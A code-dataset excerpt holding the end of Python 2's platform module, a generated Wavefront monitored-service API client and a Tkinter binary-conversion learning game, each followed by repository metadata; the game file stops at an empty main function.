system = 'Windows'
elif system[:4] == 'java':
release,vendor,vminfo,osinfo = java_ver()
system = 'Java'
version = string.join(vminfo,', ')
if not version:
version = vendor
# System specific extensions
if system == 'OpenVMS':
# OpenVMS seems to have release and version mixed up
if not release or release == '0':
release = version
version = ''
# Get processor information
try:
import vms_lib
except ImportError:
pass
else:
csid, cpu_number = vms_lib.getsyi('SYI$_CPU',0)
if (cpu_number >= 128):
processor = 'Alpha'
else:
processor = 'VAX'
if not processor:
# Get processor information from the uname system command
processor = _syscmd_uname('-p','')
#If any unknowns still exist, replace them with ''s, which are more portable
if system == 'unknown':
system = ''
if node == 'unknown':
node = ''
if release == 'unknown':
release = ''
if version == 'unknown':
version = ''
if machine == 'unknown':
machine = ''
if processor == 'unknown':
processor = ''
# normalize name
if system == 'Microsoft' and release == 'Windows':
system = 'Windows'
release = 'Vista'
_uname_cache = system,node,release,version,machine,processor
return _uname_cache
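# Illustrative only: on a hypothetical Linux host the cached tuple is
#   ('Linux', 'myhost', '2.6.32-431.el6.x86_64',
#    '#1 SMP Fri Nov 22 03:15:09 UTC 2013', 'x86_64', 'x86_64')
# where the processor entry (from 'uname -p') often repeats the machine value.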
### Direct interfaces to some of the uname() return values
def system():
""" Returns the system/OS name, e.g. 'Linux', 'Windows' or 'Java'.
An empty string is returned if the value cannot be determined.
"""
return uname()[0]
def node():
""" Returns the computer's network name (which may not be fully
qualified)
An empty string is returned if the value cannot be determined.
"""
return uname()[1]
def release():
""" Returns the system's release, e.g. '2.2.0' or 'NT'
An empty string is returned if the value cannot be determined.
"""
return uname()[2]
def version():
""" Returns the system's release version, e.g. '#3 on degas'
An empty string is returned if the value cannot be determined.
"""
return uname()[3]
def machine():
""" Returns the machine type, e.g. 'i386'
An empty string is returned if the value cannot be determined.
"""
return uname()[4]
def processor():
""" Returns the (true) processor name, e.g. 'amdk6'
An empty string is returned if the value cannot be
determined. Note that many platforms do not provide this
information or simply return the same value as for machine(),
e.g. NetBSD does this.
"""
return uname()[5]
### Various APIs for extracting information from sys.version
_sys_version_parser = re.compile(
r'([\w.+]+)\s*' # "version<space>"
r'\(#?([^,]+)' # "(#buildno"
r'(?:,\s*([\w ]*)' # ", builddate"
r'(?:,\s*([\w :]*))?)?\)\s*' # ", buildtime)<space>"
r'\[([^\]]+)\]?') # "[compiler]"
_ironpython_sys_version_parser = re.compile(
    r'IronPython\s*'
    r'([\d\.]+)'
    r'(?: \(([\d\.]+)\))?'
    r' on (.NET [\d\.]+)')
# IronPython covering 2.6 and 2.7
_ironpython26_sys_version_parser = re.compile(
    r'([\d.]+)\s*'
    r'\(IronPython\s*'
    r'[\d.]+\s*'
    r'\(([\d.]+)\) on ([\w.]+ [\d.]+(?: \(\d+-bit\))?)\)'
)
_pypy_sys_version_parser = re.compile(
    r'([\w.+]+)\s*'
    r'\(#?([^,]+),\s*([\w ]+),\s*([\w :]+)\)\s*'
    r'\[PyPy [^\]]+\]?')
_sys_version_cache = {}
def _sys_version(sys_version=None):
""" Returns a parsed version of Python's sys.version as tuple
(name, version, branch, revision, buildno, builddate, compiler)
referring to the Python implementation name, version, branch,
revision, build number, build date/time as string and the compiler
identification string.
Note that unlike the Python sys.version, the returned value
for the Python version will always include the patchlevel (it
defaults to '.0').
The function returns empty strings for tuple entries that
cannot be determined.
sys_version may be given to parse an alternative version
string, e.g. if the version was read from a different Python
interpreter.
"""
# Get the Python version
if sys_version is None:
sys_version = sys.version
# Try the cache first
result = _sys_version_cache.get(sys_version, None)
if result is not None:
return result
# Parse it
if 'IronPython' in sys_version:
# IronPython
name = 'IronPython'
if sys_version.startswith('IronPython'):
match = _ironpython_sys_version_parser.match(sys_version)
else:
match = _ironpython26_sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse IronPython sys.version: %s' %
repr(sys_version))
version, alt_version, compiler = match.groups()
buildno = ''
builddate = ''
elif sys.platform.startswith('java'):
# Jython
name = 'Jython'
match = _sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse Jython sys.version: %s' %
repr(sys_version))
version, buildno, builddate, buildtime, _ = match.groups()
if builddate is None:
builddate = ''
compiler = sys.platform
elif "PyPy" in sys_version:
# PyPy
name = "PyPy"
match = _pypy_sys_version_parser.match(sys_version)
if match is None:
raise ValueError("failed to parse PyPy sys.version: %s" %
repr(sys_version))
version, buildno, builddate, buildtime = match.groups()
compiler = ""
else:
# CPython
match = _sys_version_parser.match(sys_version)
if match is None:
raise ValueError(
'failed to parse CPython sys.version: %s' %
repr(sys_version))
version, buildno, builddate, buildtime, compiler = \
match.groups()
name = 'CPython'
if builddate is None:
builddate = ''
elif buildtime:
builddate = builddate + ' ' + buildtime
if hasattr(sys, 'subversion'):
# sys.subversion was added in Python 2.5
_, branch, revision = sys.subversion
else:
branch = ''
revision = ''
# Add the patchlevel version if missing
l = string.split(version, '.')
if len(l) == 2:
l.append('0')
version = string.join(l, '.')
# Build and cache the result
result = (name, version, branch, revision, buildno, builddate, compiler)
_sys_version_cache[sys_version] = result
return result
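# Illustrative only: parsing a hypothetical CPython banner such as
#   '2.7.6 (default, Mar 22 2014, 22:59:56) \n[GCC 4.8.2]'
# yields ('CPython', '2.7.6', <branch>, <revision>, 'default',
# 'Mar 22 2014 22:59:56', 'GCC 4.8.2'), with branch/revision taken from
# sys.subversion of the running interpreter when available.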
def python_implementation():
""" Returns a string identifying the Python implementation.
Currently, the following implementations are identified:
'CPython' (C implementation of Python),
'IronPython' (.NET implementation of Python),
'Jython' (Java implementation of Python),
'PyPy' (Python implementation of Python).
"""
return _sys_version()[0]
def python_version():
""" Returns the Python version as string 'major.minor.patchlevel'
Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).
"""
return _sys_version()[1]
def python_version_tuple():
""" Returns the Python version as tuple (major, minor, patchlevel)
of strings.
Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).
"""
return tuple(string.split(_sys_version()[1], '.'))
def python_branch():
""" Returns a string identifying the Python implementation
branch.
For CPython this is the Subversion branch from which the
Python binary was built.
If not available, an empty string is returned.
"""
return _sys_version()[2]
def python_revision():
""" Returns a string identifying the Python implementation
revision.
For CPython this is the Subversion revision from which the
Python binary was built.
If not available, an empty string is returned.
"""
return _sys_version()[3]
def python_build():
""" Returns a tuple (buildno, builddate) stating the Python
build number and date as strings.
"""
return _sys_version()[4:6]
def python_compiler():
""" Returns a string identifying the compiler used for compiling
Python.
"""
return _sys_version()[6]
### The Opus Magnum of platform strings :-)
_platform_cache = {}
def platform(aliased=0, terse=0):
""" Returns a single string identifying the underlying platform
with as much useful information as possible (but no more :).
The output is intended to be human readable rather than
machine parseable. It may look different on different
platforms and this is intended.
If "aliased" is true, the function will use aliases for
various platforms that report system names which differ from
their common names, e.g. SunOS will be reported as
Solaris. The system_alias() function is used to implement
this.
Setting terse to true causes the function to return only the
absolute minimum information needed to identify the platform.
"""
result = _platform_cache.get((aliased, terse), None)
if result is not None:
return result
# Get uname information and then apply platform specific cosmetics
# to it...
system,node,release,version,machine,processor = uname()
if machine == processor:
processor = ''
if aliased:
system,release,version = system_alias(system,release,version)
if system == 'Windows':
# MS platforms
rel,vers,csd,ptype = win32_ver(version)
if terse:
platform = _platform(system,release)
else:
platform = _platform(system,release,version,csd)
elif system in ('Linux',):
# Linux based systems
distname,distversion,distid = dist('')
if distname and not terse:
platform = _platform(system,release,machine,processor,
'with',
distname,distversion,distid)
else:
# If the distribution name is unknown check for libc vs. glibc
libcname,libcversion = libc_ver(sys.executable)
platform = _platform(system,release,machine,processor,
'with',
libcname+libcversion)
elif system == 'Java':
# Java platforms
r,v,vminfo,(os_name,os_version,os_arch) = java_ver()
if terse or not os_name:
platform = _platform(system,release,version)
else:
platform = _platform(system,release,version,
'on',
os_name,os_version,os_arch)
elif system == 'MacOS':
# MacOS platforms
if terse:
platform = _platform(system,release)
else:
platform = _platform(system,release,machine)
else:
# Generic handler
if terse:
platform = _platform(system,release)
else:
bits,linkage = architecture(sys.executable)
platform = _platform(system,release,machine,processor,bits,linkage)
_platform_cache[(aliased, terse)] = platform
return platform
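# Illustrative only (hypothetical hosts): a verbose result might look like
#   'Linux-2.6.32-431.el6.x86_64-x86_64-with-centos-6.5-Final'
# on Linux, or 'Windows-7-6.1.7601-SP1' on Windows; terse=1 reduces these
# to just system and release, e.g. 'Windows-7'.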
### Command line interface
if __name__ == '__main__':
# Default is to print the aliased verbose platform string
terse = ('terse' in sys.argv or '--terse' in sys.argv)
aliased = (not 'nonaliased' in sys.argv and not '--nonaliased' in sys.argv)
print platform(aliased,terse)
sys.exit(0)
|
mit
| -3,123,977,640,802,781,000
| 30.921459
| 82
| 0.56988
| false
| 4.079859
| false
| false
| false
|
wavefrontHQ/python-client
|
wavefront_api_client/api/monitored_service_api.py
|
1
|
22234
|
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class MonitoredServiceApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
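    # A hypothetical usage sketch (host and token are placeholders), assuming
    # the Configuration class that swagger-codegen ships with this client:
    #
    #   from wavefront_api_client import ApiClient, Configuration
    #   config = Configuration()
    #   config.host = 'https://YOUR_INSTANCE.wavefront.com'
    #   config.api_key['X-AUTH-TOKEN'] = '<<API-TOKEN>>'
    #   api = MonitoredServiceApi(ApiClient(configuration=config))
    #   page = api.get_all_services(offset=0, limit=100)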
def batch_update(self, **kwargs): # noqa: E501
"""Update multiple applications and services in a batch. Batch size is limited to 100. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.batch_update(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[MonitoredServiceDTO] body: Example Body: <pre>[{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" },{ \"application\": \"beachshirts\", \"service\": \"delivery\", \"satisfiedLatencyMillis\": \"100\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }]</pre>
:return: ResponseContainer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.batch_update_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.batch_update_with_http_info(**kwargs) # noqa: E501
return data
def batch_update_with_http_info(self, **kwargs): # noqa: E501
"""Update multiple applications and services in a batch. Batch size is limited to 100. # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.batch_update_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[MonitoredServiceDTO] body: Example Body: <pre>[{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" },{ \"application\": \"beachshirts\", \"service\": \"delivery\", \"satisfiedLatencyMillis\": \"100\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }]</pre>
:return: ResponseContainer
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method batch_update" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/services', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainer', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_services(self, **kwargs): # noqa: E501
"""Get all monitored services # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_services(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_services_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_services_with_http_info(**kwargs) # noqa: E501
return data
def get_all_services_with_http_info(self, **kwargs): # noqa: E501
"""Get all monitored services # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_services_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_services" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_service(self, application, service, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_service_with_http_info(application, service, **kwargs) # noqa: E501
else:
(data) = self.get_service_with_http_info(application, service, **kwargs) # noqa: E501
return data
def get_service_with_http_info(self, application, service, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_service_with_http_info(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'service'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_service" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `get_service`") # noqa: E501
# verify the required parameter 'service' is set
if ('service' not in params or
params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `get_service`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
if 'service' in params:
path_params['service'] = params['service'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}/{service}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_services_of_application(self, application, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_services_of_application(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_services_of_application_with_http_info(application, **kwargs) # noqa: E501
else:
(data) = self.get_services_of_application_with_http_info(application, **kwargs) # noqa: E501
return data
def get_services_of_application_with_http_info(self, application, **kwargs): # noqa: E501
"""Get a specific application # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_services_of_application_with_http_info(application, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param int offset:
:param int limit:
:return: ResponseContainerPagedMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_services_of_application" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `get_services_of_application`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_service(self, application, service, **kwargs): # noqa: E501
"""Update a specific service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_service(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:param MonitoredServiceDTO body: Example Body: <pre>{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }</pre>
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_service_with_http_info(application, service, **kwargs) # noqa: E501
else:
(data) = self.update_service_with_http_info(application, service, **kwargs) # noqa: E501
return data
def update_service_with_http_info(self, application, service, **kwargs): # noqa: E501
"""Update a specific service # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_service_with_http_info(application, service, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: (required)
:param str service: (required)
:param MonitoredServiceDTO body: Example Body: <pre>{ \"application\": \"beachshirts\", \"service\": \"shopping\", \"satisfiedLatencyMillis\": \"100000\", \"customDashboardLink\": \"shopping-dashboard\", \"hidden\": \"false\" }</pre>
:return: ResponseContainerMonitoredServiceDTO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'service', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_service" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application' is set
if ('application' not in params or
params['application'] is None):
raise ValueError("Missing the required parameter `application` when calling `update_service`") # noqa: E501
# verify the required parameter 'service' is set
if ('service' not in params or
params['service'] is None):
raise ValueError("Missing the required parameter `service` when calling `update_service`") # noqa: E501
collection_formats = {}
path_params = {}
if 'application' in params:
path_params['application'] = params['application'] # noqa: E501
if 'service' in params:
path_params['service'] = params['service'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/monitoredservice/{application}/{service}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMonitoredServiceDTO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
apache-2.0
| 2,556,072,987,155,370,000
| 40.097967
| 443
| 0.588153
| false
| 4.24556
| false
| false
| false
|
RichieStacker/bingame
|
bingame_forms.py
|
1
|
9548
|
# Number-to-binary game
# Copyright (C) 2013 Jonathan Humphreys
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import random, Tkinter
from bingame_maths import get_remainder, half_number
from bingame_grading import grade
# Class to store data relevant to this form.
# error_count will need to be accessible from outside this form, though.
class GameMain():
def __init__(self, forms, apps):
self.forms = forms # Need to carry the whole dictionary across every damn class.
self.apps = apps
self.parent = self.forms["root"] # root is the parent of all widgets created in this class.
self.number = random.randint(1, 2048) # Randomly generated, between 1 and 2048. The player must gradually find the binary value of this number.
self.progress = self.number # The current number that must be divided by 2 to continue. Initially the same as "number".
self.answer = 0 # The player's answer.
self.remainder = 0 # The remainder from their answer. Can only ever be 1 or 0.
self.answer_chain = [] # Stores each answer and its remainder and is recited with each step.
self.error_count = 0 # Counts the number of errors a player makes in the process of a conversion.
self.init_ui()
    # Configures the window with the appropriate parameters.
def init_ui(self):
self.parent.title("Convert to Binary") # Sets the window title.
self.parent.geometry("200x300+400+150") # Sets the window size (200x300), as well as its position (numbers preceded by plus signs).
# Canvas upon which to output the answer chain.
self.canAnswers = Tkinter.Canvas(self.parent, bg = "#EEEEEE")
self.canAnswers.place(bordermode = "outside", x = 5, y = 5, width = 190, height = 190)
        # Label to visually identify the error counter.
self.lblErrorsTag = Tkinter.Label(self.parent, anchor = "w", text = "Errors:")
self.lblErrorsTag.place(bordermode = "outside", x = 5, y = 200, width = 145, height = 25)
# The error counter itself. It's a label, so requires a StringVar to be assigned to the widget's 'textvariable' property.
# It's awkward like that.
self.error_value = Tkinter.StringVar()
self.error_value.set(str(self.error_count))
self.lblErrors = Tkinter.Label(self.parent, anchor = "w", textvariable = self.error_value)
self.lblErrors.place(bordermode = "outside", x = 155, y = 200, width = 40, height = 25)
# Label to hold the last correct answer. Saves some confusion by having it right next to the answer entry boxes.
self.last_answer_value = Tkinter.StringVar()
self.last_answer_value.set(str(self.progress))
self.lblLastAnswer = Tkinter.Label(self.parent, anchor = "w", textvariable = self.last_answer_value)
self.lblLastAnswer.place(bordermode = "outside", x = 5, y = 230, width = 60, height = 25)
        # Entry box to accept the answer rounded down to the nearest whole number.
self.entAnswer = Tkinter.Entry(self.parent, justify = "center")
self.entAnswer.place(bordermode = "outside", x = 70, y = 230, width = 105, height = 25)
# Entry box to accept the remainder left after working out the answer.
self.entRemainder = Tkinter.Entry(self.parent, justify = "center")
self.entRemainder.place(bordermode = "outside", x = 175, y = 230, width = 20, height = 25)
# A big ol' button to submit the player's answer.
self.btnSubmit = Tkinter.Button(self.parent, text = "Submit", command = self.submit_answer)
self.btnSubmit.place(bordermode = "outside", x = 5, y = 260, width = 190, height = 35)
def submit_answer(self):
        # Try to extract the answer and remainder from the entry boxes. If either
        # cannot be converted to an integer, increase the error counter by 1.
try:
self.answer = int(self.entAnswer.get())
self.remainder = int(self.entRemainder.get())
# If both values are correct, add it to the answer chain.
# Otherwise, an error for you, player.
if self.answer == half_number(self.progress) and self.remainder == get_remainder(self.progress):
self.remainder = get_remainder(self.progress)
self.progress = half_number(self.progress)
self.answer_chain.append(self.canAnswers.create_text(0,12 * len(self.answer_chain), anchor = "nw", text = str(self.progress) + " r" + str(self.remainder)))
else:
self.error_count += 1
except ValueError:
self.error_count += 1
# Update the error counter and the current value to be dividing. Also clear the entry boxes.
self.error_value.set(str(self.error_count))
self.last_answer_value.set(str(self.progress))
self.entAnswer.delete(0, "end")
self.entRemainder.delete(0, "end")
# If the player has reached 0, it's time to bring forth the binary entry form.
if self.progress == 0:
binary_entry(self.forms, self.apps)
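# A worked example of the repeated-halving scheme the two forms implement:
# starting from 13, the correct submissions are 6 r1, 3 r0, 1 r1, 0 r1;
# reading the remainders from the last back to the first gives 1101,
# which matches bin(13).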
class EnterBinary():
def __init__ (self, forms, apps):
self.forms = forms
self.apps = apps
self.parent = forms["binary"] # binary being the parent form for every widget here.
self.apps["game"] = apps["game"]
self.final_binary = bin(apps["game"].number) # The final binary value representing the number.
self.binary_answer = "" # The player's attempt at entering the binary value.
self.init_ui()
def init_ui(self):
self.parent.title("Enter binary")
self.parent.geometry("300x35+400+150")
# The entry box for the player's binary answer. The player needs to look back on their answers and enter all
# of the remainders from the last one up to the first.
self.entBinary = Tkinter.Entry(self.parent, justify = "center")
self.entBinary.place(bordermode = "outside", x = 5, y = 5, width = 195, height = 25)
# Button that does what it says on the tin: submits the answer.
self.btnSubmit = Tkinter.Button(self.parent, text = "Submit", command = self.submit_answer)
self.btnSubmit.place(bordermode = "outside", x = 205, y = 5, width = 90, height = 25)
def submit_answer(self):
# Take the player's answer from the entry box and precede it with "0b" so that it can be easily compared
# with the correct answer.
self.binary_answer = "0b" + self.entBinary.get()
# If the answer's correct, call the scorecard window.
# Otherwise, increase the error counter by 1 and update the main window accordingly.
if self.binary_answer == self.final_binary:
scorecard(self.forms,self.apps)
else:
self.apps["game"].error_count += 1
self.apps["game"].error_value.set(str(self.apps["game"].error_count))
class FinalScore():
def __init__ (self, forms, apps):
self.forms = forms
self.apps = apps
self.parent = forms["scorecard"] # scorecard is the parent for all widgets in this class.
self.error_count = apps["game"].error_count # Pass the error counter to one local to this window.
self.grade = grade(self.error_count) # Obtain a grade based on the number of errors made by the player.
# Get rid of the root and binary forms. They are no longer needed.
forms["root"].destroy()
del(apps["game"])
forms["binary"].destroy()
del(apps["binary"])
self.init_ui()
def init_ui(self):
self.parent.title("Scorecard")
self.parent.geometry("300x100+400+150")
# Label to show the player's error count, and the grade determined from that number.
self.lblScore = Tkinter.Label(self.parent, anchor = "center", text = "Errors made:\n" + str(self.error_count) + "\nYour grade:\n" + self.grade)
self.lblScore.place(bordermode = "outside", x = 5, y = 5, width = 290, height = 60)
# Button to play again.
self.btnPlayAgain = Tkinter.Button(self.parent, text = "Play again", command = self.play_again)
self.btnPlayAgain.place(bordermode = "outside", x = 5, y = 70, width = 140, height = 25)
# Button to quit.
self.btnQuit = Tkinter.Button(self.parent, text = "Exit", command = self.quit_game)
self.btnQuit.place(bordermode = "outside", x = 155, y = 70, width = 140, height = 25)
    # Destroys the window (ending its event loop); the del merely drops the local reference.
def quit_game(self):
self.parent.destroy()
del(self)
# Destroys this window and spawns a new game window.
def play_again(self):
self.parent.destroy()
main()
del(self)
def main():
